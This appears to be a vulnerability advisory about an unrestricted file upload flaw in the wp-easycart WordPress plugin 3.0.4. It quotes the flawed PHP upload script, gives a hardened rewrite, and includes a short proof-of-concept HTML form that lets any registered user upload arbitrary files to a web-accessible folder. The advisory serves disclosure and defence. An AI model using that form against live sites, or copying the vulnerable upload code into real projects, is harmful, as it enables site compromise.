08-01-2015 / Vulnerabilities

WordPress Shopping Cart 3.0.4 Unrestricted File Upload

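Any registered user can upload any file: the upload script accepts the request when the caller is either an administrator or simply logged in, and it places no restriction on the uploaded file's name or extension.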

File: wp-easycart\inc\amfphp\administration\banneruploaderscript.php

$date = $_POST['datemd5'];
$usersqlquery = sprintf("SELECT  ec_user.*, ec_role.admin_access FROM  ec_user  LEFT JOIN ec_role ON (ec_user.user_level = ec_role.role_label) WHERE  ec_user.password = '%s' AND  (ec_user.user_level = 'admin' OR ec_role.admin_access = 1)", mysql_real_escape_string($requestID));
$userresult = mysql_query($usersqlquery);
$users = mysql_fetch_assoc($userresult);
// The admin lookup above is made moot by the second condition: any logged-in user passes.
if ($users || is_user_logged_in()) {
	$filename = $_FILES['Filedata']['name'];
	$filetmpname = $_FILES['Filedata']['tmp_name'];
	$fileType = $_FILES["Filedata"]["type"];
	$fileSizeMB = ($_FILES["Filedata"]["size"] / 1024 / 1000);
	$explodedfilename = pathinfo($filename);
	$nameoffile = $explodedfilename['filename'];
	$fileextension = $explodedfilename['extension'];
	// Name and extension come from the client-supplied file name and $date from $_POST['datemd5']; none is validated.
	move_uploaded_file($_FILES['Filedata']['tmp_name'], "../../../products/banners/".$nameoffile."_".$date.".".$fileextension);
}
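
A hardened form of the upload branch above, as an added example: it is not the plugin's code and not the vendor's 3.0.9 fix. It assumes WordPress is loaded (the original already calls is_user_logged_in()); the function name ec_handle_banner_upload and the nonce action ec_banner_upload are hypothetical.

```php
<?php
// Added example (not the plugin's code). Assumes WordPress is loaded, as in
// the original script, which already calls is_user_logged_in().
// Hypothetical names: ec_handle_banner_upload(), nonce action 'ec_banner_upload'.
function ec_handle_banner_upload( array $file, $banner_dir ) {
	// 1. Authorization: require an administrator capability, not just a session.
	if ( ! current_user_can( 'manage_options' ) ) {
		return new WP_Error( 'forbidden', 'Administrator access required.' );
	}
	// 2. CSRF: the admin form must carry a nonce for this action.
	$nonce = isset( $_POST['_wpnonce'] ) ? $_POST['_wpnonce'] : '';
	if ( ! wp_verify_nonce( $nonce, 'ec_banner_upload' ) ) {
		return new WP_Error( 'bad_nonce', 'Invalid request token.' );
	}
	// 3. Transport: accept only a completed HTTP upload.
	if ( ! isset( $file['error'], $file['tmp_name'], $file['name'] )
		|| UPLOAD_ERR_OK !== $file['error']
		|| ! is_uploaded_file( $file['tmp_name'] ) ) {
		return new WP_Error( 'bad_upload', 'Upload failed.' );
	}
	// 4. Type: allow-list of image extensions, so the stored file can never
	//    end in .php; recent WordPress versions also compare image content
	//    with the extension inside this call.
	$allowed = array(
		'jpg|jpeg' => 'image/jpeg',
		'png'      => 'image/png',
		'gif'      => 'image/gif',
	);
	$check = wp_check_filetype_and_ext( $file['tmp_name'], $file['name'], $allowed );
	if ( empty( $check['ext'] ) || empty( $check['type'] ) ) {
		return new WP_Error( 'bad_type', 'Only JPEG, PNG or GIF banners are accepted.' );
	}
	// 5. Name: generated server-side; no part of the client file name or of
	//    $_POST['datemd5'] reaches the path.
	$name   = 'banner_' . wp_generate_password( 20, false ) . '.' . $check['ext'];
	$target = trailingslashit( $banner_dir ) . $name;
	if ( ! move_uploaded_file( $file['tmp_name'], $target ) ) {
		return new WP_Error( 'move_failed', 'Could not store the banner.' );
	}
	return $target;
}

// Usage in place of the original if-block:
// $result = ec_handle_banner_upload( $_FILES['Filedata'], '../../../products/banners' );
```

Disabling script execution for products/banners/ at the web server adds a second layer in case one of these checks is ever bypassed.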

Proof of Concept

Log in as a regular user (created using wp-login.php?action=register) and submit the following form:

<form action="http://wordpress-install/wp-content/plugins/wp-easycart/inc/amfphp/administration/banneruploaderscript.php" method="post" enctype="multipart/form-data">
    <input type="hidden" name="datemd5" value="1">
    <input type="file" name="Filedata">
    <input value="Upload!" type="submit">
</form>

The uploaded file will then be visible at:

http://wordpress-install/wp-content/plugins/wp-easycart/products/banners/%filename%_1.%fileextension%

Timeline

  • 29-10-2014: Discovered
  • 16-11-2014: Vendor notified
  • 17-11-2014: Version 3.0.9 released, issue resolved